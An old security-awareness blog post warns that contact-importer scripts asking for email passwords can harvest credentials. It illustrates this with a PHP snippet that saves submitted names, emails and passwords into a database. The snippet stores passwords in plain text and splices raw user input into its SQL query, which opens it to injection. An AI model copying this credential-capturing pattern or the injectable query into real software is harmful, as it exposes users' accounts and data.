cute robot

TimNash.co.uk

Dev/Sec/Ops with a splattering of humour

You Could Be My ATM With One Line Of Code

Really old post – This post is from 10 years, 11 months and has not been updated, some if not all of the information maybe out of date. Proceed with caution.

How Many of us have thought wouldn’t it be great to have our own cash machines sitting in our living room, well today potentially we all can. The spam all your friend  scripts still are doing the round much to my horror and so I wanted to show you just how easy it is for unscrupulous marketers or indeed developers to catch your username and password for your email account.

Your World Ruined with one line of code

Just think about it for a moment, what private details are in your account? Paypal account perhaps? hmm what about your bank details ¦

Your Email is in this day and age the effective way into your life, never give your password away even your administrators will never ask for your password as if they are indeed your email admin they already have back end access.

I really want to drive home how potentially dangerous these scripts could be, but I think Andy has done a good job with How to Screw Up Your Business a must read for all marketers thinking of using such features.

So how would a marketer or developer screw your business?


$name = $_POST['importername'];
$email = $_POST['email'];
$password = $_POST['password'];
$description = $_POST['description'];

$SQL = " INSERT INTO cashmachine ";
$SQL = $SQL . " (name, email, password) VALUES ";
$SQL = $SQL . " ('$name', '$email','$password'";
$result = mysql_db_query($db,"$SQL");

Those simple lines of code added to the friends adder script by the Marketer or even the developer will happily store your info into a db for their pleasure ¦
Are people doing this right now? Some one will be, it might not be the marketer who asked for your password though, many PHP scripts are delivered encrypted what is lurking behind there? a call to another server perhaps?